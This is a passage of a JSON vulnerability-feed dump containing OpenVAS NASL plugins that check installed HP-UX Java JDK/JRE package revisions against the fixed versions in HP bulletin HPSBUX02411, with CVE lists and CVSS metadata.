rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835195", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835195\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 